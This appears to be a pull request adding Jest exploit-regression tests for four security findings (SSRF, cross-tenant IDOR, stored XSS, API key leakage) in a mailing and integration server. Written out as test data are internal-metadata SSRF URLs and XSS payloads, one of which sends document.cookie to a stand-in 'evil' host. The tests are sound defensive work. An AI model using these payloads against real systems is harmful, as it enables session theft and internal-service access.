### PR TITLE
test(security): tests d'exploitation E2E pour les 4 findings (F1-F4)

### DIFF
--- a/tests/server/security/exploit-f1-ssrf-apihost.test.js
+++ b/tests/server/security/exploit-f1-ssrf-apihost.test.js
@@ -1,0 +1,123 @@
+'use strict';
+
+// EXPLOIT TEST — Finding 1: SSRF via integration apiHost.
+//
+// Threat: a group_admin sets apiHost to an internal address (cloud metadata
+// 169.254.169.254, loopback, private range). The server then issues outbound
+// requests (carrying the API key / signed JWT) to that host. Before the fix,
+// only the URL scheme was validated.
+//
+// This replays the attack through the REAL integrationService.createIntegration
+// and updateIntegration, asserting the malicious host is rejected before any
+// document is created/updated. Literal IPs are used so no DNS lookup is needed
+// (deterministic, offline).
+
+jest.mock('../../../packages/server/common/models.common', () => ({
+  Integrations: {
+    create: jest.fn(),
+    findById: jest.fn(),
+    exists: jest.fn(),
+  },
+  Dashboards: {},
+}));
+jest.mock('../../../packages/server/group/group.service', () => ({
+  findById: jest.fn(),
+}));
+jest.mock(
+  '../../../packages/server/integration-providers/provider-factory',
+  () => ({ createProvider: jest.fn() })
+);
+jest.mock('../../../packages/server/utils/logger.js', () => ({
+  log: jest.fn(),
+  error: jest.fn(),
+}));
+
+const integrationService = require('../../../packages/server/integration/integration.service');
+const {
+  Integrations,
+} = require('../../../packages/server/common/models.common');
+const ERROR_CODES = require('../../../packages/server/constant/error-codes.js');
+
+const MALICIOUS_HOSTS = [
+  'http://169.254.169.254', // AWS/GCP metadata
+  'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
+  'http://127.0.0.1:9200', // loopback (e.g. local elasticsearch)
+  'http://10.0.0.5', // private range
+  'https://192.168.1.1', // private range (https too)
+  'http://[::1]:6379', // IPv6 loopback (e.g. redis)
+];
+
+describe('EXPLOIT F1 — SSRF via integration apiHost', () => {
+  beforeEach(() => {
+    jest.clearAllMocks();
+    Integrations.exists.mockResolvedValue(false);
+    Integrations.create.mockResolvedValue({ _id: 'x' });
+  });
+
+  describe('createIntegration', () => {
+    it.each(MALICIOUS_HOSTS)(
+      'ATTACK BLOCKED: rejects apiHost %s without creating anything',
+      async (apiHost) => {
+        await expect(
+          integrationService.createIntegration({
+            name: 'evil',
+            type: 'ai',
+            provider: 'openai',
+            apiKey: 'sk-secret',
+            apiHost,
+            _company: '507f1f77bcf86cd799439011',
+          })
+        ).rejects.toMatchObject({
+          message: ERROR_CODES.INTEGRATION_VALIDATION_FAILED,
+        });
+        // Crucially: no document was created with the malicious host.
+        expect(Integrations.create).not.toHaveBeenCalled();
+      }
+    );
+
+    it('LEGIT: a public https host is accepted', async () => {
+      await integrationService.createIntegration({
+        name: 'ok',
+        type: 'ai',
+        provider: 'openai',
+        apiKey: 'sk-secret',
+        apiHost: 'https://8.8.8.8', // public literal IP, no DNS
+        _company: '507f1f77bcf86cd799439011',
+      });
+      expect(Integrations.create).toHaveBeenCalledTimes(1);
+    });
+
+    it('LEGIT: no apiHost (uses provider default) is accepted', async () => {
+      await integrationService.createIntegration({
+        name: 'ok',
+        type: 'ai',
+        provider: 'openai',
+        apiKey: 'sk-secret',
+        apiHost: null,
+        _company: '507f1f77bcf86cd799439011',
+      });
+      expect(Integrations.create).toHaveBeenCalledTimes(1);
+    });
+  });
+
+  describe('updateIntegration', () => {
+    it('ATTACK BLOCKED: cannot switch an existing integration to a metadata host', async () => {
+      Integrations.findById.mockResolvedValue({
+        _id: 'i1',
+        name: 'existing',
+        type: 'ai',
+        _company: '507f1f77bcf86cd799439011',
+        save: jest.fn(),
+      });
+
+      await expect(
+        integrationService.updateIntegration({
+          integrationId: '507f1f77bcf86cd799439033',
+          apiHost: 'http://169.254.169.254',
+        })
+      ).rejects.toMatchObject({
+        message: ERROR_CODES.INTEGRATION_VALIDATION_FAILED,
+      });
+    });
+  });
+});

--- a/tests/server/security/exploit-f2-idor-cross-tenant.test.js
+++ b/tests/server/security/exploit-f2-idor-cross-tenant.test.js
@@ -1,0 +1,109 @@
+'use strict';
+
+// EXPLOIT TEST — Finding 2: cross-tenant IDOR via "Duplicate + Translate".
+//
+// Threat: a group_admin of group A submits the mailingId of a mailing owned by
+// group B. Before the fix, the code loaded the source mailing with an unscoped
+// findOne(id), so the attacker could read/copy another tenant's content.
+//
+// This test wires a REALISTIC multi-tenant DB mock: Mailings.findOne honours the
+// `_company` filter exactly like MongoDB would. We then replay the attack
+// through the real mailingService.findOneForUser (the control point used by the
+// translation controller and duplicate/copy paths) and assert it is blocked.
+
+jest.mock('../../../packages/server/common/models.common', () => ({
+  Mailings: {
+    findOne: jest.fn(),
+  },
+  Workspaces: {},
+  Folders: {},
+  Tags: {},
+  Folder: {},
+  Profile: {},
+  Group: {},
+  Users: {},
+  Templates: {},
+  Galleries: {},
+}));
+jest.mock('../../../packages/server/utils/logger.js', () => ({
+  log: jest.fn(),
+  warn: jest.fn(),
+  error: jest.fn(),
+}));
+
+const { Mailings } = require('../../../packages/server/common/models.common');
+const mailingService = require('../../../packages/server/mailing/mailing.service');
+const ERROR_CODES = require('../../../packages/server/constant/error-codes.js');
+
+const GROUP_A = '507f1f77bcf86cd799439a01';
+const GROUP_B = '507f1f77bcf86cd799439b01';
+const VICTIM_MAILING_ID = '507f1f77bcf86cd799439055'; // belongs to GROUP_B
+
+// Seed DB: a single mailing that belongs to GROUP B.
+const DB = [
+  {
+    _id: VICTIM_MAILING_ID,
+    _company: GROUP_B,
+    name: 'Group B confidential mailing',
+    data: { secret: 'group-B-only' },
+  },
+];
+
+// Realistic MongoDB-like findOne: matches _id AND (if present) _company.
+function dbFindOne(query) {
+  const idFilter = query._id ? String(query._id) : null;
+  const companyFilter = query._company ? String(query._company) : null;
+  const doc = DB.find(
+    (m) =>
+      (!idFilter || String(m._id) === idFilter) &&
+      (!companyFilter || String(m._company) === companyFilter)
+  );
+  return Promise.resolve(doc || null);
+}
+
+describe('EXPLOIT F2 — cross-tenant IDOR (duplicate-translate / copy)', () => {
+  beforeEach(() => {
+    jest.clearAllMocks();
+    Mailings.findOne.mockImplementation(dbFindOne);
+  });
+
+  it('ATTACK BLOCKED: group A admin cannot load a group B mailing by id', async () => {
+    const attacker = { isAdmin: false, group: { id: GROUP_A } };
+
+    // The attacker targets group B's mailing id.
+    await expect(
+      mailingService.findOneForUser(VICTIM_MAILING_ID, attacker)
+    ).rejects.toMatchObject({ message: ERROR_CODES.MAILING_NOT_FOUND });
+
+    // And the query that was sent to the DB was group-scoped to the attacker.
+    const sentQuery = Mailings.findOne.mock.calls[0][0];
+    expect(String(sentQuery._company)).toBe(GROUP_A);
+    // The victim's content never came back.
+  });
+
+  it('LEGIT: group B admin CAN load their own mailing', async () => {
+    const owner = { isAdmin: false, group: { id: GROUP_B } };
+
+    const mailing = await mailingService.findOneForUser(
+      VICTIM_MAILING_ID,
+      owner
+    );
+
+    expect(mailing).toBeTruthy();
+    expect(String(mailing._company)).toBe(GROUP_B);
+  });
+
+  it('LEGIT: super admin is unscoped and CAN load any mailing', async () => {
+    const superAdmin = { isAdmin: true };
+
+    const mailing = await mailingService.findOneForUser(
+      VICTIM_MAILING_ID,
+      superAdmin
+    );
+
+    expect(mailing).toBeTruthy();
+    // No _company filter was applied for the super admin.
+    const sentQuery = Mailings.findOne.mock.calls[0][0];
+    expect(sentQuery._company).toBeUndefined();
+  });
+});

--- a/tests/server/security/exploit-f3-stored-xss.test.js
+++ b/tests/server/security/exploit-f3-stored-xss.test.js
@@ -1,0 +1,85 @@
+'use strict';
+
+// EXPLOIT TEST — Finding 3: stored XSS via LLM translation output.
+//
+// Threat: the translation provider (LLM) returns markup instead of plain text
+// (spontaneously or via prompt injection from the email content). That output
+// is injected into previewHtml, stored, and later served as text/html — a
+// stored-XSS sink.
+//
+// This replays the FULL pipeline used by the translation controller:
+//   updatePreviewWithTranslations()  (injects the provider output)
+//   -> sanitizePreviewHtml()         (the fix, run before persisting)
+// and asserts no script / event handler / dangerous URL survives.
+
+const {
+  updatePreviewWithTranslations,
+} = require('../../../packages/server/translation/preview-html-updater');
+const {
+  sanitizePreviewHtml,
+} = require('../../../packages/server/translation/preview-html-sanitizer.js');
+
+// Simulate the real flow: original preview rendered from the source mailing,
+// then the LLM "translates" a text key into an XSS payload.
+function runPipeline(originalText, maliciousTranslation, previewHtml) {
+  const originalTexts = { 'data.block.text': originalText };
+  const translations = { 'data.block.text': maliciousTranslation };
+  const injected = updatePreviewWithTranslations(
+    previewHtml,
+    originalTexts,
+    translations
+  );
+  // This is exactly what the controller now persists.
+  return sanitizePreviewHtml(injected);
+}
+
+describe('EXPLOIT F3 — stored XSS via translated preview', () => {
+  it('ATTACK BLOCKED: <script> from provider output is stripped', () => {
+    const stored = runPipeline(
+      'Hello',
+      'Hello<script>document.location="https://evil/"+document.cookie</script>',
+      '<html><body><p>Hello</p></body></html>'
+    );
+    expect(stored).not.toContain('<script');
+    expect(stored).not.toContain('document.cookie');
+  });
+
+  it('ATTACK BLOCKED: img onerror handler from provider output is stripped', () => {
+    const stored = runPipeline(
+      'Photo',
+      '<img src=x onerror=alert(document.domain)>',
+      '<html><body><p>Photo</p></body></html>'
+    );
+    expect(stored).not.toContain('onerror');
+    expect(stored).not.toContain('alert(');
+  });
+
+  it('ATTACK BLOCKED: javascript: link from provider output is neutralized', () => {
+    const stored = runPipeline(
+      'Click',
+      '<a href="javascript:alert(1)">Click</a>',
+      '<html><body><p>Click</p></body></html>'
+    );
+    expect(stored).not.toContain('javascript:');
+  });
+
+  it('ATTACK BLOCKED: svg/onload payload is stripped', () => {
+    const stored = runPipeline(
+      'Logo',
+      '<svg/onload=alert(1)>',
+      '<html><body><p>Logo</p></body></html>'
+    );
+    expect(stored).not.toContain('onload');
+  });
+
+  it('LEGIT: a benign translation is preserved (no false positive)', () => {
+    const stored = runPipeline(
+      'Bonjour',
+      'Hello',
+      '<html><body><table><tr><td>Bonjour</td></tr></table></body></html>'
+    );
+    expect(stored).toContain('Hello');
+    expect(stored).toContain('<table');
+    expect(stored).toContain('<td');
+  });
+});

--- a/tests/server/security/exploit-f4-apikey-leak.test.js
+++ b/tests/server/security/exploit-f4-apikey-leak.test.js
@@ -1,0 +1,115 @@
+'use strict';
+
+// EXPLOIT TEST — Finding 4: API key leak in integration HTTP responses.
+//
+// Threat: the integration document carries a DECRYPTED apiKey in memory (the
+// encryption plugin decrypts it in a post-find hook). mongoose-hidden only
+// masks toJSON(), not toObject()/raw spread, so returning the document directly
+// would leak the key. The fix routes every response through toIntegrationDto().
+//
+// This drives the REAL controller handlers with a fake res that captures the
+// JSON body, using a document whose toObject() exposes the key (as in prod),
+// and asserts the key never reaches the wire.
+
+jest.mock('../../../packages/server/group/group.service', () => ({
+  checkIfUserIsAuthorizedToAccessGroup: jest.fn().mockResolvedValue(true),
+}));
+
+const integrationController = require('../../../packages/server/integration/integration.controller');
+const integrationService = require('../../../packages/server/integration/integration.service');
+
+const SECRET = 'sk-super-secret-decrypted-key-1234567890';
+
+// A Mongoose-doc-like object: toObject() exposes the decrypted apiKey, exactly
+// like the real document after the encryption plugin's post-find hook.
+function makeDocLike(overrides = {}) {
+  const plain = {
+    _id: 'int-1',
+    name: 'Prod OpenAI',
+    type: 'ai',
+    provider: 'openai',
+    apiHost: 'https://api.openai.com',
+    apiKey: SECRET, // decrypted in memory
+    isActive: true,
+    validationStatus: 'valid',
+    ...overrides,
+  };
+  return { ...plain, toObject: () => ({ ...plain }) };
+}
+
+function fakeRes() {
+  return {
+    statusCode: 200,
+    body: undefined,
+    status(code) {
+      this.statusCode = code;
+      return this;
+    },
+    json(payload) {
+      this.body = payload;
+      return this;
+    },
+  };
+}
+
+describe('EXPLOIT F4 — API key never leaks in HTTP responses', () => {
+  afterEach(() => jest.restoreAllMocks());
+
+  it('ATTACK FAILS: GET /integrations/:id response has no apiKey', async () => {
+    jest
+      .spyOn(integrationService, 'checkIfUserIsAuthorizedToAccessIntegration')
+      .mockResolvedValue(makeDocLike());
+
+    const res = fakeRes();
+    await integrationController.getIntegration(
+      { user: { isAdmin: true }, params: { integrationId: 'int-1' } },
+      res,
+      () => {}
+    );
+
+    expect(JSON.stringify(res.body)).not.toContain(SECRET);
+    expect(res.body.apiKey).toBeUndefined();
+    // Useful fields still present.
+    expect(res.body.name).toBe('Prod OpenAI');
+    expect(res.body.validationStatus).toBe('valid');
+  });
+
+  it('ATTACK FAILS: list response has no apiKey in any item', async () => {
+    jest
+      .spyOn(integrationService, 'findAllByGroup')
+      .mockResolvedValue([makeDocLike(), makeDocLike({ _id: 'int-2' })]);
+
+    const res = fakeRes();
+    await integrationController.listIntegrations(
+      { user: { isAdmin: true }, params: { groupId: 'g1' }, query: {} },
+      res,
+      () => {}
+    );
+
+    expect(JSON.stringify(res.body)).not.toContain(SECRET);
+    res.body.items.forEach((item) => expect(item.apiKey).toBeUndefined());
+  });
+
+  it('ATTACK FAILS: update response has no apiKey', async () => {
+    jest
+      .spyOn(integrationService, 'checkIfUserIsAuthorizedToAccessIntegration')
+      .mockResolvedValue(makeDocLike());
+    jest
+      .spyOn(integrationService, 'updateIntegration')
+      .mockResolvedValue(makeDocLike({ name: 'Renamed' }));
+
+    const res = fakeRes();
+    await integrationController.updateIntegration(
+      {
+        user: { isAdmin: true },
+        params: { integrationId: 'int-1' },
+        body: { name: 'Renamed' },
+      },
+      res,
+      () => {}
+    );
+
+    expect(JSON.stringify(res.body)).not.toContain(SECRET);
+    expect(res.body.apiKey).toBeUndefined();
+  });
+});


### PR DESCRIPTION
Ajoute des tests qui rejouent l'attaque réelle contre le vrai code, en plus des tests unitaires existants :

- F1 SSRF : createIntegration/updateIntegration rejettent un apiHost interne (169.254.169.254, loopback, plages privées, IPv6) sans rien créer.
- F2 IDOR : DB multi-tenant mockée réaliste ; un group_admin de A ne peut pas charger un mailing de B via findOneForUser (404), owner et super admin OK.
- F3 XSS stocké : pipeline complet updatePreviewWithTranslations ->
  sanitizePreviewHtml ; script/onerror/javascript:/svg onload de la sortie LLM ne survivent pas, traduction bénigne préservée.
- F4 fuite clé : handlers réels du controller via un fake res ; apiKey jamais dans la réponse (get/list/update), même quand toObject() l'expose.

Chaque exploit a été vérifié rouge sans son fix puis vert avec (pas de faux positif). 411 tests serveur OK.